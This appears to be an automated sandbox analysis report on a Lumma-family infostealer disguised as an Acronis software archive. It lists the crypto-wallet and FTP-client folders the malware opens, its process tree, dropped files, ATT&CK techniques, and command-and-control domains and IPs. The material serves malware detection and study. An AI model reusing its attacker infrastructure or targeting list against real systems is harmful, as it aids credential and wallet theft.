                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Roaming\FTPbox
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Roaming\FTPInfo
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Roaming\FTPGetter
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Roaming\FTPRush
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\ProgramData\SiteDesigner\3D-FTP
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Roaming\Binance
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
                Source: Yara matchFile source: Process Memory Space: Palestine.com PID: 6176, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Palestine.com PID: 6148, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: Process Memory Space: Palestine.com PID: 6176, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Palestine.com PID: 6148, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts21
                Windows Management Instrumentation
                1
                DLL Side-Loading
                1
                Abuse Elevation Control Mechanism
                2
                Deobfuscate/Decode Files or Information
                2
                OS Credential Dumping
                12
                File and Directory Discovery
                Remote Services41
                Data from Local System
                1
                Ingress Tool Transfer
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts2
                Command and Scripting Interpreter
                1
                Scheduled Task/Job
                1
                DLL Side-Loading
                1
                Abuse Elevation Control Mechanism
                1
                Credential API Hooking
                124
                System Information Discovery
                Remote Desktop Protocol1
                Credential API Hooking
                1
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                Scheduled Task/Job
                Logon Script (Windows)12
                Process Injection
                1
                Timestomp
                21
                Input Capture
                321
                Security Software Discovery
                SMB/Windows Admin Shares21
                Input Capture
                3
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts3
                PowerShell
                Login Hook1
                Scheduled Task/Job
                1
                DLL Side-Loading
                NTDS3
                Process Discovery
                Distributed Component Object ModelInput Capture114
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script111
                Masquerading
                LSA Secrets121
                Virtualization/Sandbox Evasion
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts121
                Virtualization/Sandbox Evasion
                Cached Domain Credentials1
                Application Window Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Process Injection
                DCSync2
                System Owner/User Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                Rundll32
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1579835 Sample: acronis recovery expert del... Startdate: 23/12/2024 Architecture: WINDOWS Score: 100 138 shearhoaxx.click 2->138 140 slotwang.com 2->140 142 3 other IPs or domains 2->142 150 Suricata IDS alerts for network traffic 2->150 152 Found malware configuration 2->152 154 Malicious sample detected (through community Yara rule) 2->154 156 6 other signatures 2->156 14 acronis recovery expert deluxe 1.0.0.132.rarl.exe 32 2->14         started        16 acronis recovery expert deluxe 1.0.0.132.rarl.exe 8 2->16         started        18 rundll32.exe 2->18         started        signatures3 process4 process5 20 cmd.exe 3 14->20         started        24 cmd.exe 16->24         started        file6 104 C:\Users\user\AppData\Local\...\Palestine.com, PE32 20->104 dropped 158 Drops PE files with a suspicious file extension 20->158 26 Palestine.com 1 20->26         started        31 cmd.exe 2 20->31         started        33 conhost.exe 20->33         started        41 7 other processes 20->41 35 Palestine.com 24->35         started        37 conhost.exe 24->37         started        39 tasklist.exe 24->39         started        43 6 other processes 24->43 signatures7 process8 dnsIp9 144 shearhoaxx.click 172.67.129.49, 443, 49701, 49702 CLOUDFLARENETUS United States 26->144 146 slotwang.com 45.66.248.134, 443, 49710 FREERANGECLOUDCA Russian Federation 26->146 148 kliplorihoe0.shop 172.67.182.135, 443, 49709 CLOUDFLARENETUS United States 26->148 120 C:\Users\user\...\5RLYIRN4B2NNKHJ11UTSZ2.exe, PE32 26->120 dropped 166 Query firmware table information (likely to detect VMs) 26->166 168 Found many strings related to Crypto-Wallets (likely being stolen) 26->168 170 Encrypted powershell cmdline option found 26->170 172 LummaC encrypted strings found 26->172 45 5RLYIRN4B2NNKHJ11UTSZ2.exe 26->45         started        49 powershell.exe 26->49         started        122 C:\Users\user\...\V2DDYDPIWYUTCJYUB0IV5.exe, PE32 35->122 dropped 174 Tries to harvest and steal ftp login credentials 35->174 176 Tries to harvest and steal browser information (history, passwords, etc) 35->176 178 Tries to steal Crypto Currency Wallets 35->178 52 V2DDYDPIWYUTCJYUB0IV5.exe 35->52         started        file10 signatures11 process12 dnsIp13 124 C:\Users\user\...\5RLYIRN4B2NNKHJ11UTSZ2.tmp, PE32 45->124 dropped 180 Multi AV Scanner detection for dropped file 45->180 54 5RLYIRN4B2NNKHJ11UTSZ2.tmp 45->54         started        136 kliptedehoa.shop 104.21.35.89, 443, 49711 CLOUDFLARENETUS United States 49->136 126 C:\Users\user\AppData\Local\...\tipskins.dll, PE32+ 49->126 dropped 128 C:\Users\user\AppData\Local\...\msncore.dll, PE32 49->128 dropped 130 C:\Users\user\AppData\Local\...\msn.exe, PE32 49->130 dropped 134 19 other files (16 malicious) 49->134 dropped 182 Powershell drops PE file 49->182 57 msn.exe 49->57         started        60 conhost.exe 49->60         started        132 C:\Users\user\...\V2DDYDPIWYUTCJYUB0IV5.tmp, PE32 52->132 dropped 62 V2DDYDPIWYUTCJYUB0IV5.tmp 52->62         started        file14 signatures15 process16 file17 116 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 54->116 dropped 64 5RLYIRN4B2NNKHJ11UTSZ2.exe 54->64         started        160 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 57->160 162 Switches to a custom stack to bypass stack traces 57->162 164 Found direct / indirect Syscall (likely to bypass EDR) 57->164 118 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 62->118 dropped 67 V2DDYDPIWYUTCJYUB0IV5.exe 62->67         started        signatures18 process19 file20 100 C:\Users\user\...\5RLYIRN4B2NNKHJ11UTSZ2.tmp, PE32 64->100 dropped 69 5RLYIRN4B2NNKHJ11UTSZ2.tmp 64->69         started        102 C:\Users\user\...\V2DDYDPIWYUTCJYUB0IV5.tmp, PE32 67->102 dropped 72 V2DDYDPIWYUTCJYUB0IV5.tmp 67->72         started        process21 file22 106 C:\Users\user\AppData\...\is-2QEM3.tmp, PE32 69->106 dropped 108 C:\Users\user\...\electronics.exe (copy), PE32 69->108 dropped 110 C:\Users\user\...\windowplugin.dll (copy), PE32 69->110 dropped 114 132 other files (105 malicious) 69->114 dropped 74 cmd.exe 69->74         started        76 cmd.exe 69->76         started        78 cmd.exe 69->78         started        80 4 other processes 69->80 112 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 72->112 dropped process23 process24 82 conhost.exe 74->82         started        84 tasklist.exe 74->84         started        86 find.exe 74->86         started        88 conhost.exe 76->88         started        90 tasklist.exe 76->90         started        92 find.exe 76->92         started        94 conhost.exe 78->94         started        96 2 other processes 78->96 98 9 other processes 80->98

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                No Antivirus matches
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\7za.dll0%ReversingLabs
                C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\CN.dll0%ReversingLabs
                C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\CloudStorageService.dll0%ReversingLabs
                C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\FSharp.Core.dll0%ReversingLabs
                C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\Microsoft.Build.Tasks.CodeAnalysis.dll0%ReversingLabs
                C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\Microsoft.Data.Entity.Design.dll0%ReversingLabs
                C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\Microsoft.Developer.IdentityService.GitHubProvider.UI.dll0%ReversingLabs
                C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\Microsoft.NET.Build.Extensions.Tasks.dll0%ReversingLabs
                C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\Microsoft.SharePoint.BusinessData.Administration.Client.dll0%ReversingLabs
                C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\Microsoft.VisualStudio.Text.Logic.dll0%ReversingLabs
                C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\NuGet.Build.Tasks.Pack.resources.dll0%ReversingLabs
                C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\System.ServiceModel.Web.dll0%ReversingLabs
                C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\WinPixSysMonController.dll0%ReversingLabs
                C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\bass.dll0%ReversingLabs
                C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\clrjit.dll0%ReversingLabs
                C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\contactsUX.dll0%ReversingLabs
                C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\mc_dec_aac.dll0%ReversingLabs
                C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msidcrl40.dll0%ReversingLabs
                C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exe0%ReversingLabs
                C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msncore.dll48%ReversingLabsWin32.Trojan.Malgent
                C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msvcr80.dll0%ReversingLabs
                C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\tipskins.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exe18%ReversingLabsWin32.Spyware.Lummastealer
                C:\Users\user\AppData\Local\Temp\650429\Palestine.com0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exe18%ReversingLabsWin32.Spyware.Lummastealer
                C:\Users\user\AppData\Local\Temp\is-45OJH.tmp\_isetup\_setup64.tmp0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\is-I30SH.tmp\_isetup\_setup64.tmp0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\is-RLSFG.tmp\_isetup\_setup64.tmp0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\AIControlLib.dll (copy)0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\AsSQLHelper.dll (copy)0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\AsusBusinessIntelligenceCPPLib.dll (copy)0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\CPUManufacturerCmdLib.dll (copy)0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\CPUTypeCmdLib.dll (copy)0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\DIMMCapacityLib.dll (copy)0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\DRAMManufacturerLib.dll (copy)0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\DRAMSpeedLib.dll (copy)0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\DeviceUninstall.dll (copy)0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\DiskMediaTypeLib.dll (copy)0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\FAN.dll (copy)0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\FanProfile.exe (copy)0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\HWComponentPlugin.dll (copy)0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\HalUninstall.dll (copy)0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\HardDiskCapacityLib.dll (copy)0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\HttpUtilityV2.dll (copy)0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\ICSharpCode.SharpZipLib.dll (copy)0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\KillProcess.dll (copy)0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\LogHelper.exe (copy)0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\MB_Home.dll (copy)0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Microsoft.Azure.KeyVault.Core.dll (copy)0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Microsoft.Azure.Storage.Blob.dll (copy)0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Microsoft.Azure.Storage.Common.dll (copy)0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\NICInfoLib.dll (copy)0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Newtonsoft.Json.dll (copy)0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\OPHWInfo.dll (copy)0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\PocoInitializer.dll (copy)0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Qt5Core.dll (copy)0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Qt5Gui.dll (copy)0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Qt5Network.dll (copy)0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Qt5OpenGL.dll (copy)0%ReversingLabs
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                NameIPActiveMaliciousAntivirus DetectionReputation
                kliplorihoe0.shop
                172.67.182.135
                truefalse
                  unknown
                  shearhoaxx.click
                  172.67.129.49
                  truetrue
                    unknown
                    slotwang.com
                    45.66.248.134
                    truefalse
                      unknown
                      kliptedehoa.shop
                      104.21.35.89
                      truefalse
                        unknown
                        cGJmezVyRdXbTgHBdDquAsIHIVjMv.cGJmezVyRdXbTgHBdDquAsIHIVjMv
                        unknown
                        unknownfalse
                          unknown
                          NameMaliciousAntivirus DetectionReputation
                          aspecteirs.latfalse
                            high
                            https://shearhoaxx.click/apitrue
                              unknown
                              sustainskelet.latfalse
                                high
                                rapeflowwj.latfalse
                                  high
                                  energyaffai.latfalse
                                    high
                                    grannyejh.latfalse
                                      high
                                      necklacebudi.latfalse
                                        high
                                        NameSourceMaliciousAntivirus DetectionReputation
                                        http://c.msn.com/c.gifmsn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmpfalse
                                          high
                                          https://duckduckgo.com/chrome_newtabPalestine.com, 00000011.00000003.1515289732.00000000047D3000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000003.1515047236.0000000004861000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000003.1859913711.00000000043D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupUPalestine.com, 00000011.00000003.1729130091.0000000006BED000.00000004.00000800.00020000.00000000.sdmp, 5RLYIRN4B2NNKHJ11UTSZ2.exe, 00000025.00000000.2019186157.0000000000591000.00000020.00000001.01000000.0000000D.sdmp, V2DDYDPIWYUTCJYUB0IV5.exe, 00000044.00000000.2346752958.0000000000CB7000.00000020.00000001.01000000.00000016.sdmpfalse
                                              high
                                              https://certs.securetrust.com/CA0:Palestine.com, 00000011.00000003.1992606677.00000000048C9000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000002.2032778211.0000000001D37000.00000004.00000020.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.00000000042E3000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.000000000430D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://duckduckgo.com/ac/?q=Palestine.com, 00000011.00000003.1515289732.00000000047D3000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000003.1515047236.0000000004861000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000003.1859913711.00000000043D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://schemas.xmlsoap.org/ws/2003/03/rmmsn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmpfalse
                                                    high
                                                    http://g.msn.com/1csauthx/authxmsn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmpfalse
                                                      high
                                                      http://www.hotmail.com/SHSetUnreadMailCountWmsn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmpfalse
                                                        high
                                                        http://g.msn.com/7MEAPPSDIR/1??DI=9647&HL=7hmsn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmpfalse
                                                          high
                                                          http://www.inkscape.org/)V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            unknown
                                                            http://certs.securetrust.com/issuers/VCTWGTSCA_L1.crt0Palestine.com, 00000011.00000003.1992606677.00000000048C9000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000002.2032778211.0000000001D37000.00000004.00000020.00020000.00000000.sdmp, Palestine.com, 00000011.00000002.2039631031.00000000048CB000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.00000000042E3000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.000000000430D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://web.resource.org/cc/V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://shearhoaxx.click:443/apigesPalestine.com, 00000011.00000002.2023662646.0000000001ABE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  http://www.msn.com/webservices/spaces/v1/GetXmlFeedmsn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmpfalse
                                                                    high
                                                                    https://www.autoitscript.com/autoit3/Palestine.com, 00000011.00000003.1466749906.000000000515C000.00000004.00000800.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2536685277.0000000000D5C000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://crl.vikingcloud.com/TWGCA.crl0tPalestine.com, 00000011.00000003.1992606677.00000000048C9000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000002.2032778211.0000000001D37000.00000004.00000020.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.00000000042E3000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.000000000430D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://kliplorihoe0.shop/Palestine.com, 00000011.00000002.2039631031.00000000048BC000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000003.1992606677.00000000048B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          https://certs.securetrust.com/CA05Palestine.com, 00000011.00000003.1992606677.00000000048C9000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000002.2032778211.0000000001D37000.00000004.00000020.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.00000000042E3000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.000000000430D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://messenger.live.com/ws/2006/09/oim/Store2msn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmpfalse
                                                                              high
                                                                              https://shearhoaxx.click/api.Palestine.com, 0000001F.00000002.2389704146.0000000001610000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                https://www.remobjects.com/ps5RLYIRN4B2NNKHJ11UTSZ2.exe, 00000025.00000003.2033628807.000000007F1EB000.00000004.00001000.00020000.00000000.sdmp, 5RLYIRN4B2NNKHJ11UTSZ2.exe, 00000025.00000003.2023868066.00000000030FF000.00000004.00001000.00020000.00000000.sdmp, 5RLYIRN4B2NNKHJ11UTSZ2.tmp, 00000028.00000000.2044954076.0000000000CF1000.00000020.00000001.01000000.0000000F.sdmp, 5RLYIRN4B2NNKHJ11UTSZ2.tmp, 0000002A.00000000.2081536277.0000000000C3D000.00000020.00000001.01000000.00000013.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000045.00000000.2365650084.000000000051D000.00000020.00000001.01000000.00000017.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000000.2427066699.000000000116D000.00000020.00000001.01000000.00000018.sdmpfalse
                                                                                  high
                                                                                  https://nuget.org/nuget.exepowershell.exe, 00000021.00000002.2333308097.000000000609E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://www.innosetup.com/5RLYIRN4B2NNKHJ11UTSZ2.exe, 00000025.00000003.2033628807.000000007F1EB000.00000004.00001000.00020000.00000000.sdmp, 5RLYIRN4B2NNKHJ11UTSZ2.exe, 00000025.00000003.2023868066.00000000030FF000.00000004.00001000.00020000.00000000.sdmp, 5RLYIRN4B2NNKHJ11UTSZ2.tmp, 00000028.00000000.2044954076.0000000000CF1000.00000020.00000001.01000000.0000000F.sdmp, 5RLYIRN4B2NNKHJ11UTSZ2.tmp, 0000002A.00000000.2081536277.0000000000C3D000.00000020.00000001.01000000.00000013.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000045.00000000.2365650084.000000000051D000.00000020.00000001.01000000.00000017.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000000.2427066699.000000000116D000.00000020.00000001.01000000.00000018.sdmpfalse
                                                                                      high
                                                                                      http://msn.commsn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmpfalse
                                                                                        high
